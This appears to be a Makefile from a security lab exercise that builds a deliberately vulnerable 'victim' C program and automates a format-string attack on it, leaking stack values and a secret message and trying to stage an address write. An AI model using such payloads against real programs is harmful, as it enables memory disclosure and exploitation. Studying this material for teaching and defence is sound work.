# This is an attempt to automate the construction of an attack against
# the victim program that uses user input as a format string.
#

all: victim

victim: victim.c
	gcc -Wall -fno-stack-protector -o victim victim.c

inspect: victim
	@# exploring the stack until we find the pointer to the string...
	./victim "$$(python -c "print '%#018lx  '*20")"
	@# using the $ formatting symbol, we can pick the 'right'
	@# argument on the stack, so lets read the secret message...
	./victim '%1$$s'

findformat: victim
	@# try to find the actual format string characters on the stack
	@# adjust the repetition factors for the Bs to align the As 
	./victim "$$(python -c "print 'B'*14 + 'A'*8 + 'B'*5 + '\n' + '%#018lx  '*144")"
	@# lets try to write an address where the As are...
	@# ... does not work since argv strings can't contain null bytes
	./victim "$$(python -c "print 'B'*14 + '\x43\x43\x43\x43\x43\x43\x43\x43' + 'B'*5 + '\n' + '%#018lx  '*144")"

clean:
	rm -f victim